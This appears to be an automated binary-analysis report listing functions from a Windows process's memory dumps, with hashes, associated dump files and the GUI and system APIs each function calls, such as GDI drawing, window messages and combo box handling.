                                                                                • Instruction ID: 5f1e0b84fd10a6aad774d858520218bd5ddfa74f3397e226cba7e1f76148b756
                                                                                • Opcode Fuzzy Hash: 1e7bd92853b28cd1a8fdc541d7300b93a6b6b50eb318f4510f7bc62ddeef206c
                                                                                • Instruction Fuzzy Hash: 2BE19D70700225EBDB14EF55ECD1ABF37A8EF08314FA0851AF815DA281DB39DA11DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $w
                                                                                • API String ID: 0-1564209528
                                                                                • Opcode ID: ca78ee85deb9cac06e8d29a47a06e25c92e6372e5d26db3cf25b85dd7cb782fa
                                                                                • Instruction ID: 706524ec9c2ed56ddc1040b975a4221d8b0047791b716802c5582edfeaf28837
                                                                                • Opcode Fuzzy Hash: ca78ee85deb9cac06e8d29a47a06e25c92e6372e5d26db3cf25b85dd7cb782fa
                                                                                • Instruction Fuzzy Hash: E3F168B0D0021AEBDF14CF95C885BEEBBB5BF48314F21D15AE511AB281D7389A81CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Iconic
                                                                                • String ID:
                                                                                • API String ID: 110040809-0
                                                                                • Opcode ID: 5745741be777b8c682683d4e1118cac93e2abbf4dee2a71bd048c0f7810c53d4
                                                                                • Instruction ID: fd356119b0f5e1805246c1e60627eae280fa245f218770b7097e1a6b2c2794a3
                                                                                • Opcode Fuzzy Hash: 5745741be777b8c682683d4e1118cac93e2abbf4dee2a71bd048c0f7810c53d4
                                                                                • Instruction Fuzzy Hash: CAC08C70A1920CEB8708CF88E800C1DB7FCEB08321B0082DDFC0883300CA32EE008A98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00424EC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 058e9bac54c765fec20eca56afce03b233c84653d5bb80b615e3f3fc1e0d6c2e
                                                                                • Instruction ID: 108043aa667b0e2dec700df90bfffadf0695a5696602e4d7b5ec83efbf675db2
                                                                                • Opcode Fuzzy Hash: 058e9bac54c765fec20eca56afce03b233c84653d5bb80b615e3f3fc1e0d6c2e
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                                • Instruction ID: b5cba75e2ccb3f599b9d031728bfd560ec4bd997c6fdada36654579999dcd9a7
                                                                                • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                                • Instruction Fuzzy Hash: 83B1AD75A0061ADFDB15CF04D5D0AA9BBA1FF48328F64C1AEC80A5B342D775EE46CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 749def59540ea8172b0c03d07183d7e68b522f821a4efd5fb73b1de9d0969a1e
                                                                                • Instruction ID: 6412ba3454d7caa3ccf8c1eb8c75b05bf3dc832fd6a347cbc3d8397c2cbfd44d
                                                                                • Opcode Fuzzy Hash: 749def59540ea8172b0c03d07183d7e68b522f821a4efd5fb73b1de9d0969a1e
                                                                                • Instruction Fuzzy Hash: E91104B5D00208AFCB04DF94D8819AEB7B5BB48300F2484AAD809A7301E734EF54CF92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82428a06129f0725db19307c150047b4c39713eb8a06e81b1d8ae44c8b984a54
                                                                                • Instruction ID: eb05f924cac9e2cd43bda79ffc6b72cf78f2e1a1432b488b5c2c4d500a86cba7
                                                                                • Opcode Fuzzy Hash: 82428a06129f0725db19307c150047b4c39713eb8a06e81b1d8ae44c8b984a54
                                                                                • Instruction Fuzzy Hash: 001104B5D40208EFCB14DF94D8819AEB7B5BB4C300F2485AAD819A7341E634AF55CF92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 34f07fc11ea3be595edf0570006f9ed60ff909c28cad2b300e1ed09bc833a650
                                                                                • Instruction ID: 77d9a9fb65cb97d3c038e7a52c9602304c00cae3818c77ba78c371bfac5425de
                                                                                • Opcode Fuzzy Hash: 34f07fc11ea3be595edf0570006f9ed60ff909c28cad2b300e1ed09bc833a650
                                                                                • Instruction Fuzzy Hash: 79B00239661540CFCA55CF08C194E00F3F4FB58760B068491EC05CB722C234ED40CA40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d794bf1f07835c3b10fea10e438be3f5a82aefe50a0e308fa37c15277350eef3
                                                                                • Instruction ID: 08eb0ad0d3f855e474f3ff173f69043067d91ea7c285dfdd00ec0894cc9890fd
                                                                                • Opcode Fuzzy Hash: d794bf1f07835c3b10fea10e438be3f5a82aefe50a0e308fa37c15277350eef3
                                                                                • Instruction Fuzzy Hash: ABB00279661550CFCA51CB08C294E10F3F4FB48770B068591EC09CB722C234ED40CA01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
                                                                                • Instruction ID: 09a661d3bcde169e3a68bda8983e2d082d1c510c2daa6ab026a58b72df35bac7
                                                                                • Opcode Fuzzy Hash: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
                                                                                • Instruction Fuzzy Hash: 3AA00235692980CFCE16CF08C290F0073B4F754B40F010490E401C7A21C228ED40C940
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 00428BA4
                                                                                • GetParent.USER32(?), ref: 00428BBD
                                                                                • SetBkMode.GDI32(?,00000002), ref: 00428BCD
                                                                                • GetClientRect.USER32 ref: 00428BDF
                                                                                • SendMessageA.USER32 ref: 00428C07
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428C17
                                                                                  • Part of subcall function 00428850: InflateRect.USER32(?,000000FF,000000FF), ref: 00428892
                                                                                  • Part of subcall function 00428850: IsWindowEnabled.USER32(?), ref: 004288A5
                                                                                  • Part of subcall function 00428850: InflateRect.USER32(?,000000FF,000000FF), ref: 004288CC
                                                                                  • Part of subcall function 00428850: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004288E3
                                                                                  • Part of subcall function 00428850: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004288FC
                                                                                  • Part of subcall function 00428850: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00428914
                                                                                  • Part of subcall function 00428850: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0042892E
                                                                                  • Part of subcall function 00428850: SelectObject.GDI32(?,00000000), ref: 00428953
                                                                                • GetSysColor.USER32(0000000F), ref: 00428C29
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00428C2D
                                                                                • GetSysColor.USER32(00000012), ref: 00428C35
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00428C39
                                                                                • SendMessageA.USER32 ref: 00428C4B
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428C53
                                                                                • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00428C78
                                                                                • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00428CB0
                                                                                • IsWindowEnabled.USER32(?), ref: 00428CB7
                                                                                • SendMessageA.USER32 ref: 00428CCB
                                                                                • GetWindowTextA.USER32 ref: 00428D39
                                                                                • SelectObject.GDI32(?,?), ref: 0042908F
                                                                                • SelectObject.GDI32(?,00000000), ref: 004290A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
                                                                                • String ID:
                                                                                • API String ID: 2549663215-0
                                                                                • Opcode ID: a9c174a17e16bae0cc4d3d62f3dd64787f12c19678e3b306853782825521580b
                                                                                • Instruction ID: 93173b2fc57c215b2f73895c902e304185b7d0f425fe4c4ab5f1868347d98ed2
                                                                                • Opcode Fuzzy Hash: a9c174a17e16bae0cc4d3d62f3dd64787f12c19678e3b306853782825521580b
                                                                                • Instruction Fuzzy Hash: 90F158B1208301AFD304DF64DD88A6FB7F8FB88705F40492DF68186251DB79EA45CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
                                                                                • String ID: ComboBox
                                                                                • API String ID: 930961256-1152790111
                                                                                • Opcode ID: 8f2b197bd65f0a043a6b92a79a55198d3b6ef1b4b6b81643ad33dd3d086e3224
                                                                                • Instruction ID: 9a16b6aebf19d18f6321c2df1a78772bd02d21516cb3fd94b97d1bf1a82e3f7f
                                                                                • Opcode Fuzzy Hash: 8f2b197bd65f0a043a6b92a79a55198d3b6ef1b4b6b81643ad33dd3d086e3224
                                                                                • Instruction Fuzzy Hash: 2991D171608301AFE3109F64EC49F7FB7E8EB84709F40082EFA4196281DB78DA45CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044E660,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427ADB
                                                                                • GetDC.USER32(00000000), ref: 00427AE3
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00427AF4
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00427AFB
                                                                                • GetSystemMetrics.USER32 ref: 00427B19
                                                                                • GetSystemMetrics.USER32 ref: 00427B24
                                                                                • ReleaseDC.USER32 ref: 00427B3A
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427B54
                                                                                • LeaveCriticalSection.KERNEL32(0044E660,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427B70
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427B87
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427B99
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427BA6
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427BCA
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427BD7
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427BFB
                                                                                • GetSystemMetrics.USER32 ref: 00427C0E
                                                                                • GetClassInfoA.USER32 ref: 00427C51
                                                                                • GetClassInfoA.USER32 ref: 00427C6E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
                                                                                • String ID: Button$C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
                                                                                • API String ID: 1233821986-2558600121
                                                                                • Opcode ID: 39cb75dea45708cd1ff5e8fec15b53ac4dbdfa068dec4ba5e57ff832b4ee32a4
                                                                                • Instruction ID: 66779ac86e72c6dddd43edfefee93dfe431c375f38cf9c836ce35f91e100b3cf
                                                                                • Opcode Fuzzy Hash: 39cb75dea45708cd1ff5e8fec15b53ac4dbdfa068dec4ba5e57ff832b4ee32a4
                                                                                • Instruction Fuzzy Hash: 6C410A38B443149AF7109F65FC82B667BA0FB54715FD20437E900833A0DBBC99468BAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00426D60: SetBkColor.GDI32(?), ref: 00426D7D
                                                                                  • Part of subcall function 00426D60: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426DCA
                                                                                  • Part of subcall function 00426D60: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426DF9
                                                                                  • Part of subcall function 00426D60: SetBkColor.GDI32(?,?), ref: 00426E17
                                                                                  • Part of subcall function 00426D60: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426E42
                                                                                  • Part of subcall function 00426D60: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426E7C
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00428892
                                                                                • IsWindowEnabled.USER32(?), ref: 004288A5
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004288CC
                                                                                • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004288E3
                                                                                • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004288FC
                                                                                • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00428914
                                                                                • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0042892E
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428953
                                                                                • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00428977
                                                                                • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00428997
                                                                                • SelectObject.GDI32(?,00000000), ref: 004289AD
                                                                                • PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 004289DB
                                                                                • PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 004289FC
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00428A12
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428A2C
                                                                                • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 00428A54
                                                                                • IsWindowEnabled.USER32(?), ref: 00428A5F
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00428A70
                                                                                • OffsetRect.USER32 ref: 00428AFC
                                                                                  • Part of subcall function 00426D60: SetBkColor.GDI32(?,00000000), ref: 00426E84
                                                                                • DrawTextA.USER32(?,?,?,?,00000020), ref: 00428B34
                                                                                • GetFocus.USER32 ref: 00428B40
                                                                                • InflateRect.USER32(?,00000001,00000001), ref: 00428B51
                                                                                • IntersectRect.USER32 ref: 00428B62
                                                                                • DrawFocusRect.USER32 ref: 00428B6E
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428B81
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
                                                                                • String ID:
                                                                                • API String ID: 1611134597-0
                                                                                • Opcode ID: 03fa01c814b5d5bdf5949661c03ac3a7363c27539915638b09bb1072ab922299
                                                                                • Instruction ID: 93093aa1a0f2c78e55dc18f3bb0fd48f5b1bbe49ed81b85a626c0548aa9e7718
                                                                                • Opcode Fuzzy Hash: 03fa01c814b5d5bdf5949661c03ac3a7363c27539915638b09bb1072ab922299
                                                                                • Instruction Fuzzy Hash: A6B13671208201AFD304CF58DD85E6BB7E8FB88705F404A1DF599D7290DB75EA41CB6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ScreenToClient.USER32 ref: 004022E4
                                                                                • PtInRect.USER32(00000000,00000000,00000084), ref: 004022FE
                                                                                • CallWindowProcA.USER32 ref: 00402346
                                                                                • GetDC.USER32(0000000F), ref: 00402358
                                                                                • DrawFrameControl.USER32 ref: 00402370
                                                                                • ReleaseDC.USER32 ref: 00402381
                                                                                • CallWindowProcA.USER32 ref: 004023CC
                                                                                  • Part of subcall function 00401F18: BeginDeferWindowPos.USER32(00000000), ref: 00401F88
                                                                                  • Part of subcall function 00401F18: GetWindowRect.USER32 ref: 00401FC2
                                                                                  • Part of subcall function 00401F18: MapWindowPoints.USER32 ref: 00401FD7
                                                                                • InvalidateRect.USER32(00000005,00000000,00000001), ref: 00402418
                                                                                  • Part of subcall function 00402856: GetClientRect.USER32 ref: 00402868
                                                                                  • Part of subcall function 00402856: GetSystemMetrics.USER32 ref: 00402870
                                                                                  • Part of subcall function 00402856: GetSystemMetrics.USER32 ref: 00402885
                                                                                  • Part of subcall function 00402856: InvalidateRect.USER32(00000000,?,00000001,?,00401B44,FFFFFFB7,00000001), ref: 004028AC
                                                                                • CallWindowProcA.USER32 ref: 0040245F
                                                                                • GetCursorPos.USER32(00000000), ref: 00402542
                                                                                • GetWindowRect.USER32 ref: 0040256B
                                                                                • EqualRect.USER32 ref: 004025E9
                                                                                • SetWindowPos.USER32(00000200,00000000,?,?,?,?,00000014), ref: 00402620
                                                                                • GetCursorPos.USER32(?), ref: 00402646
                                                                                • GetWindowRect.USER32 ref: 00402657
                                                                                • SetCapture.USER32(000000A1), ref: 0040271E
                                                                                • ReleaseCapture.USER32 ref: 00402738
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Rect$CallProc$CaptureClientCursorInvalidateMetricsReleaseSystem$BeginControlDeferDrawEqualFramePointsScreen
                                                                                • String ID: $$:!@$:!@
                                                                                • API String ID: 330548355-551015223
